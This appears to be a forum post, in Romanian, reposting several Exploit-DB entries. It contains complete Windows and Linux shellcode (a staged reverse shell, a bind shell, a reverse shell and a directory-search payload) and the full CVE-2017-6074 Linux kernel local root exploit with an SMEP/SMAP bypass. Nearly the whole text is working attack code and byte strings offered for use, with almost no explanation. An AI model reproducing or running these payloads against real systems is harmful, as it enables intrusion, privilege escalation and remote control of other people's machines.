will be replaced with mov [esi],eax (0x0689) Z*10 offset stack to &processinfo j0 push 0x30 Y pop ecx I*48 dec ecx // zeroing ecx T push esp X pop eax //eax = &PROCESS_INFORMATION Q*4 push ecx //sub esp,16 W push edi W push edi W push edi Q push ecx Q push ecx B inc edx R push edx Q*10 push ecx jD push 0x44 T push esp Z pop edx //edx = &STARTUPINFOA hexeC push 0x65 hcmd. push 0x78652e64 T push esp // &'cmd.exe' Y pop ecx P push eax // &PROCESS_INFORMATION R push edx // &STARTUPINFOA j0 push 0x30 Z pop edx J*48 dec edx // zeroing edx R*3 push edx B inc edx R push edx J dec edx R*2 push edx Q push ecx ; &'cmd.exe' R push edx A*7 inc ecx //offset ecx to [C]exeh -> will be null terminated N*4 dec esi //offset [esi+4] to CreateProccesA S push ebx ; return address ## First Stage Shellcode ## global _start section .text _start: xor eax,eax push eax ; null terminator for createProcA mov eax,[fs:eax+0x30] ; Proccess Enviroment Block mov eax,[eax+0xc] mov esi,[eax+0x14] lodsd xchg esi,eax lodsd mov ebx,[eax+0x10] ; kernel32 mov ecx,[ebx+0x3c] ; DOS->elf_anew add ecx, ebx; Skip to PE start mov ecx, [ecx+0x78] ; offset to export table add ecx,ebx ; kernel32 image_export_dir mov esi,[ecx+0x20] ; Name Table add esi,ebx xor edx,edx getProcAddress: inc edx lodsd add eax,ebx cmp dword [eax],'GetP' jne getProcAddress cmp dword [eax+4],'rocA' jne getProcAddress ;---Function Adresses Chain---- ;[esi] GetProcAddress ;[esi+12] WSAstartup ;[esi+16] WSASocketA ;[esi+20] connect ;[esi+24] recv ;[esi+28] kernel32 ;Alphanumeric stage store: ;[esi+4] CreateProcessA ;[esi+8] ExitProccess mov esi,[ecx+0x1c] ; Functions Addresses Chain add esi,ebx mov edx,[esi+edx*4] add edx,ebx ; GetProcAddress sub esp, 32 ; Buffer for the function addresses chain push esp pop esi mov [esp],edx ; esi offset 0 -> GetProcAddress mov [esi+28],ebx ;esi offset 28 -> kernel32 ;--------winsock2.dll Address-------------- xor edi,edi push edi push 0x41797261 ; Ayra push 0x7262694c ; rbiL push 0x64616f4c ; daoL push esp push ebx call [esi] ;-----ws2_32.dll Address------- xor ecx,ecx push ecx mov cx, 0x3233 ; 0023 push ecx push 0x5f327377 ; _2sw push esp call eax mov ebp,eax ;ebp = ws2_32.dll ;-------WSAstartup Address------------- xor ecx,ecx push ecx mov cx, 0x7075 ; 00up push ecx push 0x74726174 ; trat push 0x53415357 ; SASW push esp push ebp call [esi] mov [esi+12],eax ;esi offset 12 -> WSAstartup ;-------WSASocketA Address------------- xor ecx,ecx push ecx mov cx, 0x4174 ; 00At push ecx push 0x656b636f ; ekco push 0x53415357 ; SASW push esp push ebp call [esi] mov [esi+16],eax;esi offset 16 -> WSASocketA ;------connect Address----------- push edi mov ecx, 0x74636565 ; '\0tce' shr ecx, 8 push ecx push 0x6e6e6f63 ; 'nnoc' push esp push ebp call [esi] mov [esi+20],eax;esi offset 20 -> connect ;------recv Address------------- push edi push 0x76636572 ;vcer push esp push ebp call [esi] mov [esi+24],eax;esi offset 24 -> recv ;------call WSAstartup()---------- xor ecx,ecx sub sp,700 push esp mov cx,514 push ecx call [esi+12] ;--------call WSASocket()----------- ; WSASocket(AF_INET = 2, SOCK_STREAM = 1, ; IPPROTO_TCP = 6, NULL, ;(unsigned int)NULL, (unsigned int)NULL); push eax ; if successful, eax = 0 push eax push eax mov al,6 push eax mov al,1 push eax inc eax push eax call [esi+16] xchg eax, edi ; edi = SocketRefernce ;--------call connect---------- ;struct sockaddr_in { ; short sin_family; ; u_short sin_port; ; struct in_addr sin_addr; ; char sin_zero[8]; ;}; push byte 0x1 pop edx shl edx, 24 mov dl, 0x7f ;edx = 127.0.0.1 (hex) push edx push word 0x5c11; port 4444 push word 0x2 ;int connect( ;_In_ SOCKET s, ;_In_ const struct sockaddr *name, ;_In_ int namelen ;); mov edx,esp push byte 16 ; sizeof(sockaddr) push edx ; (sockaddr*) push edi ; socketReference call [esi+20] ;--------call recv()---------- ;int recv( ;_In_ SOCKET s, ;_Out_ char *buf, ;_In_ int len, ;_In_ int flags ;); stage: push eax mov ax,950 push eax ;buffer length push esp pop ebp sub ebp,eax ; set buffer to [esp-950] push ebp ;&buf push edi ;socketReference call [esi+24] executeStage: xor edx,edx mov byte [ebp+eax-1],0xc3 ; end of the Alphanumeric buffer -> ret mov byte [ebp+96],dl ; null terminator to ExitProcess mov byte [ebp-1],0x5b ; buffer start: pop ebx -> return address dec ebp mov word [ebp+20],0x16ff ; call DWORD [esi] mov word [ebp+35],0x0689 ; mov [esi],eax mov word [ebp+110],0x16ff; call DWORD [esi] mov word [ebp+120],0x0689; mov [esi],eax mov ax,0x4173 ; As (CreateProcessA) mov ecx,[esi+28] ; ecx = kernel32 dec dl ;edx = 0x000000ff call ebp ; Execute Alphanumeric stage executeShell: mov [ecx],dl ;null terminator to 'cmd.exe' call dword [esi] ;createProcA push eax call dword [esi+4] ; ExitProccess ----------------------- unsigned char shellcode[]= "\x31\xc0\x50\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x4b\x3c\x01\xd9\x8b\x49\x78\x01\xd9\x8b\x71\x20\x01\xde\x31\xd2\x42\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x8b\x71\x1c\x01\xde\x8b\x14\x96\x01\xda\x83\xec\x20\x54\x5e\x89\x14\x24\x89\x5e\x1c\x31\xff\x57\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\x16\x31\xc9\x51\x66\xb9\x33\x32\x51\x68\x77\x73\x32\x5f\x54\xff\xd0\x89\xc5\x31\xc9\x51\x66\xb9\x75\x70\x51\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x54\x55\xff\x16\x89\x46\x0c\x31\xc9\x51\x66\xb9\x74\x41\x51\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x54\x55\xff\x16\x89\x46\x10\x57\xb9\x65\x65\x63\x74\xc1\xe9\x08\x51\x68\x63\x6f\x6e\x6e\x54\x55\xff\x16\x89\x46\x14\x57\x68\x72\x65\x63\x76\x54\x55\xff\x16\x89\x46\x18\x31\xc9\x66\x81\xec\xf4\x01\x54\x66\xb9\x02\x02\x51\xff\x56\x0c\x50\x50\x50\xb0\x06\x50\xb0\x01\x50\x40\x50\xff\x56\x10\x97\x6a\x01\x5a\xc1\xe2\x18\xb2\x7f\x52\x66\x68\x11\x5c\x66\x6a\x02\x89\xe2\x6a\x10\x52\x57\xff\x56\x14\x50\x66\xb8\xb6\x03\x50\x54\x5d\x29\xc5\x55\x57\xff\x56\x18\x31\xd2\xc6\x44\x05\xff\xc3\x88\x55\x60\xc6\x45\xff\x5b\x4d\x66\xc7\x45\x14\xff\x16\x66\xc7\x45\x23\x89\x06\x66\xc7\x45\x6e\xff\x16\x66\xc7\x45\x78\x89\x06\x66\xb8\x73\x41\x8b\x4e\x1c\xfe\xca\xff\xd5\x88\x11\xff\x16\x50\xff\x56\x04"; Sursa: https://www.exploit-db.com/exploits/41481/.

Aveti aici pdf-ul. Sursa: exploit-db.com.

;The MIT License (MIT) ;Copyright (c) 2017 Robert L. Taylor ;Permission is hereby granted, free of charge, to any person obtaining a ;copy of this software and associated documentation files (the “Software”), ;to deal in the Software without restriction, including without limitation ;the rights to use, copy, modify, merge, publish, distribute, sublicense, ;and/or sell copies of the Software, and to permit persons to whom the ;Software is furnished to do so, subject to the following conditions: ;The above copyright notice and this permission notice shall be included ;in all copies or substantial portions of the Software. ;The Software is provided “as is”, without warranty of any kind, express or ;implied, including but not limited to the warranties of merchantability, ;fitness for a particular purpose and noninfringement. In no event shall the ;authors or copyright holders be liable for any claim, damages or other ;liability, whether in an action of contract, tort or otherwise, arising ;from, out of or in connection with the software or the use or other ;dealings in the Software. ; ; For a detailed explanation of this shellcode see my blog post: ; http://a41l4.blogspot.ca/2017/02/shellrandomlisten1434.html global _start section .text _start: ; Socket push 41 pop rax push 2 pop rdi push 1 pop rsi cdq syscall ; Listen xor esi,esi xchg eax,edi mov al,50 syscall ; Accept mov al,43 syscall ; Dup 2 push 3 pop rsi xchg edi,eax dup2loop: push 33 pop rax dec esi syscall jne dup2loop ; Execve ; rax and rsi and rdx are zero already push rax ; zero terminator for the following string that we are pushing ; push /bin//sh in reverse mov rbx, '/bin//sh' push rbx ; store /bin//sh address in RDI push rsp pop rdi ; Call the Execve syscall mov al, 59 syscall Sursa: https://www.exploit-db.com/exploits/41468/

# Title: Windows x86 - Executable directory search Shellcode (130 bytes) # Date: 26-02-2017 # Author: Krzysztof Przybylski # Platform: Win_x86 # Tested on: WinXP SP1 # Shellcode Size: 130 bytes /* Description: write & exec dir searcher starts from C:\ If dir found then write, execute (ping 127.1.1.1) and exit If Write/noexec dir found then continue Tested on WinXP SP1 (77e6fd35;77e798fd) i686-w64-mingw32-gcc shell.c -o golddgger.exe Null-free version: (gdb) disassemble Dump of assembler code for function function: => 0x08048062 <+0>: pop ecx 0x08048063 <+1>: xor eax,eax 0x08048065 <+3>: mov BYTE PTR [ecx+0x64],al 0x08048068 <+6>: push eax 0x08048069 <+7>: push ecx 0x0804806a <+8>: mov eax,0x77e6fd35 0x0804806f <+13>: call eax 0x08048071 <+15>: xor eax,eax 0x08048073 <+17>: push eax 0x08048074 <+18>: mov eax,0x77e798fd 0x08048079 <+23>: call eax NULL-free shellcode (132 bytes): "\xeb\x19\x59\x31\xc0\x88\x41\x64" "\x50\x51\xb8" "\x35\xfd\xe6\x77" // exec "\xff\xd0\x31\xc0\x50\xb8" "\xfd\x98\xe7\x77" // exit "\xff\xd0\xe8\xe2\xff\xff\xff" "\x63\x6d\x64\x2e\x65\x78\x65\x20" "\x2f\x43\x20\x22\x28\x63\x64\x20" "\x63\x3a\x5c" // C:\ "\x20\x26\x46\x4f\x52" "\x20\x2f\x44\x20\x2f\x72\x20\x25" "\x41\x20\x49\x4e\x20\x28\x2a\x29" "\x20\x44\x4f\x20" "\x65\x63\x68\x6f\x20" "\x70\x69\x6e\x67\x20" "\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" // 127.1.1.1 "\x3e\x22\x25\x41\x5c\x7a\x2e\x62" "\x61\x74\x22\x26\x28\x63\x61\x6c" "\x6c\x20\x22\x25\x41\x5c\x7a\x2e" "\x62\x61\x74\x22\x26\x26\x65\x78" "\x69\x74\x29\x29\x22"; */ // NULL version (130 bytes): char code[] = "\xeb\x16\x59\x31\xc0\x50\x51\xb8" "\x35\xfd\xe6\x77" // exec "\xff\xd0\x31\xc0\x50\xb8" "\xfd\x98\xe7\x77" // exit "\xff\xd0\xe8\xe5\xff\xff\xff\x63" "\x6d\x64\x2e\x65\x78\x65\x20\x2f" "\x43\x20\x22\x28\x63\x64\x20" "\x63\x3a\x5c" // C:\ "\x20\x26\x46\x4f\x52\x20\x2f\x44" "\x20\x2f\x72\x20\x25\x41\x20\x49" "\x4e\x20\x28\x2a\x29\x20\x44\x4f" "\x20\x65\x63\x68\x6f\x20\x70\x69" "\x6e\x67\x20" "\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" // 127.1.1.1 "\x3e\x22\x25\x41" "\x5c\x7a\x2e\x62\x61\x74\x22\x26" "\x28\x63\x61\x6c\x6c\x20\x22\x25" "\x41\x5c\x7a\x2e\x62\x61\x74\x22" "\x26\x26\x65\x78\x69\x74\x29\x29" "\x22\x00"; int main(int argc, char **argv) { int (*func)(); func = (int (*)()) code; (int)(*func)(); } Sursa: https://www.exploit-db.com/exploits/41467/

// // EDB Note: More information ~ http://seclists.org/oss-sec/2017/q1/471 // // A proof-of-concept local root exploit for CVE-2017-6074. // Includes a semireliable SMAP/SMEP bypass. // Tested on 4.4.0-62-generic #83-Ubuntu kernel. // https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074 // // Usage: // $ gcc poc.c -o pwn // $ ./pwn // [.] namespace sandbox setup successfully // [.] disabling SMEP & SMAP // [.] scheduling 0xffffffff81064550(0x406e0) // [.] waiting for the timer to execute // [.] done // [.] SMEP & SMAP should be off now // [.] getting root // [.] executing 0x402043 // [.] done // [.] should be root now // [.] checking if we got root // [+] got r00t ^_^ // [!] don't kill the exploit binary, the kernel will crash // # cat /etc/shadow // ... // daemon:*:17149:0:99999:7::: // bin:*:17149:0:99999:7::: // sys:*:17149:0:99999:7::: // sync:*:17149:0:99999:7::: // games:*:17149:0:99999:7::: // ... // // Andrey Konovalov <andreyknvl@gmail.com> #define _GNU_SOURCE #include <errno.h> #include <fcntl.h> #include <stdarg.h> #include <stdbool.h> #include <stddef.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sched.h> #include <sys/socket.h> #include <sys/syscall.h> #include <sys/types.h> #include <sys/wait.h> #include <arpa/inet.h> #include <linux/if_packet.h> #include <netinet/if_ether.h> #define SMEP_SMAP_BYPASS 1 // Needed for local root. #define COMMIT_CREDS 0xffffffff810a2840L #define PREPARE_KERNEL_CRED 0xffffffff810a2c30L #define SHINFO_OFFSET 1728 // Needed for SMEP_SMAP_BYPASS. #define NATIVE_WRITE_CR4 0xffffffff81064550ul #define CR4_DESIRED_VALUE 0x406e0ul #define TIMER_OFFSET (728 + 48 + 104) #define KMALLOC_PAD 128 #define KMALLOC_WARM 32 #define CATCH_FIRST 6 #define CATCH_AGAIN 16 #define CATCH_AGAIN_SMALL 64 // Port is incremented on each use. static int port = 11000; void debug(const char *msg) { /* char buffer[32]; snprintf(&buffer[0], sizeof(buffer), "echo '%s' > /dev/kmsg\n", msg); system(buffer); */ } // * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * * struct ubuf_info { uint64_t callback; // void (*callback)(struct ubuf_info *, bool) uint64_t ctx; // void * uint64_t desc; // unsigned long }; struct skb_shared_info { uint8_t nr_frags; // unsigned char uint8_t tx_flags; // __u8 uint16_t gso_size; // unsigned short uint16_t gso_segs; // unsigned short uint16_t gso_type; // unsigned short uint64_t frag_list; // struct sk_buff * uint64_t hwtstamps; // struct skb_shared_hwtstamps uint32_t tskey; // u32 uint32_t ip6_frag_id; // __be32 uint32_t dataref; // atomic_t uint64_t destructor_arg; // void * uint8_t frags[16][17]; // skb_frag_t frags[MAX_SKB_FRAGS]; }; struct ubuf_info ui; void init_skb_buffer(char* buffer, void *func) { memset(&buffer[0], 0, 2048); struct skb_shared_info *ssi = (struct skb_shared_info *)&buffer[SHINFO_OFFSET]; ssi->tx_flags = 0xff; ssi->destructor_arg = (uint64_t)&ui; ssi->nr_frags = 0; ssi->frag_list = 0; ui.callback = (unsigned long)func; } struct timer_list { void *next; void *prev; unsigned long expires; void (*function)(unsigned long); unsigned long data; unsigned int flags; int slack; }; void init_timer_buffer(char* buffer, void *func, unsigned long arg) { memset(&buffer[0], 0, 2048); struct timer_list* timer = (struct timer_list *)&buffer[TIMER_OFFSET]; timer->next = 0; timer->prev = 0; timer->expires = 4294943360; timer->function = func; timer->data = arg; timer->flags = 1; timer->slack = -1; } // * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * * struct dccp_handle { struct sockaddr_in6 sa; int s1; int s2; }; void dccp_init(struct dccp_handle *handle, int port) { handle->sa.sin6_family = AF_INET6; handle->sa.sin6_port = htons(port); inet_pton(AF_INET6, "::1", &handle->sa.sin6_addr); handle->sa.sin6_flowinfo = 0; handle->sa.sin6_scope_id = 0; handle->s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP); if (handle->s1 == -1) { perror("socket(SOCK_DCCP)"); exit(EXIT_FAILURE); } int rv = bind(handle->s1, &handle->sa, sizeof(handle->sa)); if (rv != 0) { perror("bind()"); exit(EXIT_FAILURE); } rv = listen(handle->s1, 0x9); if (rv != 0) { perror("listen()"); exit(EXIT_FAILURE); } int optval = 8; rv = setsockopt(handle->s1, IPPROTO_IPV6, IPV6_RECVPKTINFO, &optval, sizeof(optval)); if (rv != 0) { perror("setsockopt(IPV6_RECVPKTINFO)"); exit(EXIT_FAILURE); } handle->s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP); if (handle->s1 == -1) { perror("socket(SOCK_DCCP)"); exit(EXIT_FAILURE); } } void dccp_kmalloc_kfree(struct dccp_handle *handle) { int rv = connect(handle->s2, &handle->sa, sizeof(handle->sa)); if (rv != 0) { perror("connect(SOCK_DCCP)"); exit(EXIT_FAILURE); } } void dccp_kfree_again(struct dccp_handle *handle) { int rv = shutdown(handle->s1, SHUT_RDWR); if (rv != 0) { perror("shutdown(SOCK_DCCP)"); exit(EXIT_FAILURE); } } void dccp_destroy(struct dccp_handle *handle) { close(handle->s1); close(handle->s2); } // * * * * * * * * * * * * * * Heap spraying * * * * * * * * * * * * * * * * * struct udp_fifo_handle { int fds[2]; }; void udp_fifo_init(struct udp_fifo_handle* handle) { int rv = socketpair(AF_LOCAL, SOCK_DGRAM, 0, handle->fds); if (rv != 0) { perror("socketpair()"); exit(EXIT_FAILURE); } } void udp_fifo_destroy(struct udp_fifo_handle* handle) { close(handle->fds[0]); close(handle->fds[1]); } void udp_fifo_kmalloc(struct udp_fifo_handle* handle, char *buffer) { int rv = send(handle->fds[0], buffer, 1536, 0); if (rv != 1536) { perror("send()"); exit(EXIT_FAILURE); } } void udp_fifo_kmalloc_small(struct udp_fifo_handle* handle) { char buffer[128]; int rv = send(handle->fds[0], &buffer[0], 128, 0); if (rv != 128) { perror("send()"); exit(EXIT_FAILURE); } } void udp_fifo_kfree(struct udp_fifo_handle* handle) { char buffer[2048]; int rv = recv(handle->fds[1], &buffer[0], 1536, 0); if (rv != 1536) { perror("recv()"); exit(EXIT_FAILURE); } } int timer_kmalloc() { int s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)); if (s == -1) { perror("socket(SOCK_DGRAM)"); exit(EXIT_FAILURE); } return s; } #define CONF_RING_FRAMES 1 void timer_schedule(int handle, int timeout) { int optval = TPACKET_V3; int rv = setsockopt(handle, SOL_PACKET, PACKET_VERSION, &optval, sizeof(optval)); if (rv != 0) { perror("setsockopt(PACKET_VERSION)"); exit(EXIT_FAILURE); } struct tpacket_req3 tp; memset(&tp, 0, sizeof(tp)); tp.tp_block_size = CONF_RING_FRAMES * getpagesize(); tp.tp_block_nr = 1; tp.tp_frame_size = getpagesize(); tp.tp_frame_nr = CONF_RING_FRAMES; tp.tp_retire_blk_tov = timeout; rv = setsockopt(handle, SOL_PACKET, PACKET_RX_RING, (void *)&tp, sizeof(tp)); if (rv != 0) { perror("setsockopt(PACKET_RX_RING)"); exit(EXIT_FAILURE); } } void socket_sendmmsg(int sock, char *buffer) { struct mmsghdr msg[1]; msg[0].msg_hdr.msg_iovlen = 0; // Buffer to kmalloc. msg[0].msg_hdr.msg_control = &buffer[0]; msg[0].msg_hdr.msg_controllen = 2048; // Make sendmmsg exit easy with EINVAL. msg[0].msg_hdr.msg_name = "root"; msg[0].msg_hdr.msg_namelen = 1; int rv = syscall(__NR_sendmmsg, sock, msg, 1, 0); if (rv == -1 && errno != EINVAL) { perror("[-] sendmmsg()"); exit(EXIT_FAILURE); } } void sendmmsg_kmalloc_kfree(int port, char *buffer) { int sock[2]; int rv = socketpair(AF_LOCAL, SOCK_DGRAM, 0, sock); if (rv != 0) { perror("socketpair()"); exit(EXIT_FAILURE); } socket_sendmmsg(sock[0], buffer); close(sock[0]); } // * * * * * * * * * * * * * * Heap warming * * * * * * * * * * * * * * * * * void dccp_connect_pad(struct dccp_handle *handle, int port) { handle->sa.sin6_family = AF_INET6; handle->sa.sin6_port = htons(port); inet_pton(AF_INET6, "::1", &handle->sa.sin6_addr); handle->sa.sin6_flowinfo = 0; handle->sa.sin6_scope_id = 0; handle->s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP); if (handle->s1 == -1) { perror("socket(SOCK_DCCP)"); exit(EXIT_FAILURE); } int rv = bind(handle->s1, &handle->sa, sizeof(handle->sa)); if (rv != 0) { perror("bind()"); exit(EXIT_FAILURE); } rv = listen(handle->s1, 0x9); if (rv != 0) { perror("listen()"); exit(EXIT_FAILURE); } handle->s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP); if (handle->s1 == -1) { perror("socket(SOCK_DCCP)"); exit(EXIT_FAILURE); } rv = connect(handle->s2, &handle->sa, sizeof(handle->sa)); if (rv != 0) { perror("connect(SOCK_DCCP)"); exit(EXIT_FAILURE); } } void dccp_kmalloc_pad() { int i; struct dccp_handle handle; for (i = 0; i < 4; i++) { dccp_connect_pad(&handle, port++); } } void timer_kmalloc_pad() { int i; for (i = 0; i < 4; i++) { socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)); } } void udp_kmalloc_pad() { int i, j; char dummy[2048]; struct udp_fifo_handle uh[16]; for (i = 0; i < KMALLOC_PAD / 16; i++) { udp_fifo_init(&uh[i]); for (j = 0; j < 16; j++) udp_fifo_kmalloc(&uh[i], &dummy[0]); } } void kmalloc_pad() { debug("dccp kmalloc pad"); dccp_kmalloc_pad(); debug("timer kmalloc pad"); timer_kmalloc_pad(); debug("udp kmalloc pad"); udp_kmalloc_pad(); } void udp_kmalloc_warm() { int i, j; char dummy[2048]; struct udp_fifo_handle uh[16]; for (i = 0; i < KMALLOC_WARM / 16; i++) { udp_fifo_init(&uh[i]); for (j = 0; j < 16; j++) udp_fifo_kmalloc(&uh[i], &dummy[0]); } for (i = 0; i < KMALLOC_WARM / 16; i++) { for (j = 0; j < 16; j++) udp_fifo_kfree(&uh[i]); } } void kmalloc_warm() { udp_kmalloc_warm(); } // * * * * * * * * * * * * * Disabling SMEP/SMAP * * * * * * * * * * * * * * * // Executes func(arg) from interrupt context multiple times. void kernel_exec_irq(void *func, unsigned long arg) { int i; struct dccp_handle dh; struct udp_fifo_handle uh1, uh2, uh3, uh4; char dummy[2048]; char buffer[2048]; printf("[.] scheduling %p(%p)\n", func, (void *)arg); memset(&dummy[0], 0xc3, 2048); init_timer_buffer(&buffer[0], func, arg); udp_fifo_init(&uh1); udp_fifo_init(&uh2); udp_fifo_init(&uh3); udp_fifo_init(&uh4); debug("kmalloc pad"); kmalloc_pad(); debug("kmalloc warm"); kmalloc_warm(); debug("dccp init"); dccp_init(&dh, port++); debug("dccp kmalloc kfree"); dccp_kmalloc_kfree(&dh); debug("catch 1"); for (i = 0; i < CATCH_FIRST; i++) udp_fifo_kmalloc(&uh1, &dummy[0]); debug("dccp kfree again"); dccp_kfree_again(&dh); debug("catch 2"); for (i = 0; i < CATCH_FIRST; i++) udp_fifo_kmalloc(&uh2, &dummy[0]); int timers[CATCH_FIRST]; debug("catch 1 -> timer"); for (i = 0; i < CATCH_FIRST; i++) { udp_fifo_kfree(&uh1); timers[i] = timer_kmalloc(); } debug("catch 1 small"); for (i = 0; i < CATCH_AGAIN_SMALL; i++) udp_fifo_kmalloc_small(&uh4); debug("schedule timers"); for (i = 0; i < CATCH_FIRST; i++) timer_schedule(timers[i], 500); debug("catch 2 -> overwrite timers"); for (i = 0; i < CATCH_FIRST; i++) { udp_fifo_kfree(&uh2); udp_fifo_kmalloc(&uh3, &buffer[0]); } debug("catch 2 small"); for (i = 0; i < CATCH_AGAIN_SMALL; i++) udp_fifo_kmalloc_small(&uh4); printf("[.] waiting for the timer to execute\n"); debug("wait"); sleep(1); printf("[.] done\n"); } void disable_smep_smap() { printf("[.] disabling SMEP & SMAP\n"); kernel_exec_irq((void *)NATIVE_WRITE_CR4, CR4_DESIRED_VALUE); printf("[.] SMEP & SMAP should be off now\n"); } // * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * * * // Executes func() from process context. void kernel_exec(void *func) { int i; struct dccp_handle dh; struct udp_fifo_handle uh1, uh2, uh3; char dummy[2048]; char buffer[2048]; printf("[.] executing %p\n", func); memset(&dummy[0], 0, 2048); init_skb_buffer(&buffer[0], func); udp_fifo_init(&uh1); udp_fifo_init(&uh2); udp_fifo_init(&uh3); debug("kmalloc pad"); kmalloc_pad(); debug("kmalloc warm"); kmalloc_warm(); debug("dccp init"); dccp_init(&dh, port++); debug("dccp kmalloc kfree"); dccp_kmalloc_kfree(&dh); debug("catch 1"); for (i = 0; i < CATCH_FIRST; i++) udp_fifo_kmalloc(&uh1, &dummy[0]); debug("dccp kfree again:"); dccp_kfree_again(&dh); debug("catch 2"); for (i = 0; i < CATCH_FIRST; i++) udp_fifo_kmalloc(&uh2, &dummy[0]); debug("catch 1 -> overwrite"); for (i = 0; i < CATCH_FIRST; i++) { udp_fifo_kfree(&uh1); sendmmsg_kmalloc_kfree(port++, &buffer[0]); } debug("catch 2 -> free & trigger"); for (i = 0; i < CATCH_FIRST; i++) udp_fifo_kfree(&uh2); debug("catch 1 & 2"); for (i = 0; i < CATCH_AGAIN; i++) udp_fifo_kmalloc(&uh3, &dummy[0]); printf("[.] done\n"); } typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds = (_commit_creds)COMMIT_CREDS; _prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED; void get_root_payload(void) { commit_creds(prepare_kernel_cred(0)); } void get_root() { printf("[.] getting root\n"); kernel_exec(&get_root_payload); printf("[.] should be root now\n"); } // * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * * void exec_shell() { char *shell = "/bin/bash"; char *args[] = {shell, "-i", NULL}; execve(shell, args, NULL); } void fork_shell() { pid_t rv; rv = fork(); if (rv == -1) { perror("fork()"); exit(EXIT_FAILURE); } if (rv == 0) { exec_shell(); } } bool is_root() { // We can't simple check uid, since we're running inside a namespace // with uid set to 0. Try opening /etc/shadow instead. int fd = open("/etc/shadow", O_RDONLY); if (fd == -1) return false; close(fd); return true; } void check_root() { printf("[.] checking if we got root\n"); if (!is_root()) { printf("[-] something went wrong =(\n"); printf("[!] don't kill the exploit binary, the kernel will crash\n"); return; } printf("[+] got r00t ^_^\n"); printf("[!] don't kill the exploit binary, the kernel will crash\n"); // Fork and exec instead of just doing the exec to avoid freeing // skbuffs and prevent crashes due to a allocator corruption. fork_shell(); } static bool write_file(const char* file, const char* what, ...) { char buf[1024]; va_list args; va_start(args, what); vsnprintf(buf, sizeof(buf), what, args); va_end(args); buf[sizeof(buf) - 1] = 0; int len = strlen(buf); int fd = open(file, O_WRONLY | O_CLOEXEC); if (fd == -1) return false; if (write(fd, buf, len) != len) { close(fd); return false; } close(fd); return true; } void setup_sandbox() { int real_uid = getuid(); int real_gid = getgid(); if (unshare(CLONE_NEWUSER) != 0) { perror("unshare(CLONE_NEWUSER)"); exit(EXIT_FAILURE); } if (unshare(CLONE_NEWNET) != 0) { perror("unshare(CLONE_NEWUSER)"); exit(EXIT_FAILURE); } if (!write_file("/proc/self/setgroups", "deny")) { perror("write_file(/proc/self/set_groups)"); exit(EXIT_FAILURE); } if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)){ perror("write_file(/proc/self/uid_map)"); exit(EXIT_FAILURE); } if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) { perror("write_file(/proc/self/gid_map)"); exit(EXIT_FAILURE); } cpu_set_t my_set; CPU_ZERO(&my_set); CPU_SET(0, &my_set); if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) { perror("sched_setaffinity()"); exit(EXIT_FAILURE); } if (system("/sbin/ifconfig lo up") != 0) { perror("system(/sbin/ifconfig lo up)"); exit(EXIT_FAILURE); } printf("[.] namespace sandbox setup successfully\n"); } int main() { setup_sandbox(); #if SMEP_SMAP_BYPASS disable_smep_smap(); #endif get_root(); check_root(); while (true) { sleep(100); } return 0; } Sursa: https://www.exploit-db.com/exploits/41458/

;The MIT License (MIT) ;Copyright (c) 2017 Robert L. Taylor ;Permission is hereby granted, free of charge, to any person obtaining a ;copy of this software and associated documentation files (the “Software”), ;to deal in the Software without restriction, including without limitation ;the rights to use, copy, modify, merge, publish, distribute, sublicense, ;and/or sell copies of the Software, and to permit persons to whom the ;Software is furnished to do so, subject to the following conditions: ;The above copyright notice and this permission notice shall be included ;in all copies or substantial portions of the Software. ;The Software is provided “as is”, without warranty of any kind, express or ;implied, including but not limited to the warranties of merchantability, ;fitness for a particular purpose and noninfringement. In no event shall the ;authors or copyright holders be liable for any claim, damages or other ;liability, whether in an action of contract, tort or otherwise, arising ;from, out of or in connection with the software or the use or other ;dealings in the Software. ; ; For a detailed explanation of this shellcode see my blog post: ; http://a41l4.blogspot.ca/2017/02/assignment-2b.html global _start section .text _start: ; Socket push 41 pop rax push 2 pop rdi push 1 pop rsi cdq syscall ; Connect xchg edi, eax push rdx mov rbx, 0xfeffff80a3eefffd ; not encoded 0x0100007f5c110002 not rbx push rbx mov al, 42 push rsp pop rsi mov dl, 16 syscall ; Dup 2 push 3 pop rsi dup2loop: mov al, 33 dec esi syscall loopnz dup2loop ; Execve ; rax and rsi are zero from the result of the last dup2 syscall and loop push rax ; zero terminator for the following string that we are pushing mov rbx, '/bin//sh' push rbx ; store /bin//sh address in RDI push rsp pop rdi cdq ; zero rdx mov al, 59 syscall Sursa: https://www.exploit-db.com/exploits/41398/

